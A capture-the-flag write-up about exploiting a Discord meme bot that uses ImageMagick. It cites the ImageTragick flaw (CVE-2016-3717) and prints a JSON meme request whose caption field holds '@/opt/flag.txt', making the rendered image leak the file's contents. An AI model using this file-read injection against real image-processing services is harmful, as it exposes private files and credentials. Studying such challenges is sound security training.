MDL Considered Harmful
ImageMagick CVE-2016-3717

Problem

There's a bot named MDLChef in the Discord. You need to DM it, it doesn't respond in the server. On its host machine, there's a file at /opt/flag.txt - it contains the flag. Go get it.
Note: This is NOT an OSINT challenge. The source code really isn't available. Good luck.
Author: nb

Solution

If we use the /credits command, we can understand more of the stack.
We can see that ImageMagick is used.
I searched for ImageMagick exploits, and found https://imagetragick.com/.
It appears that if we use caption:@/path/to/file, we can read arbitrary files.
1
{
2
version: "MDL/1.1",
3
type: "meme",
4
base: {
5
format: "Meme.Legacy.BadLuckBrian"
6
},
7
caption: {
8
topText: "@/opt/flag.txt",
9
bottomText: "image tragick"
10
}
11
}
Copied!
The rendered image contains the flag:
Copy link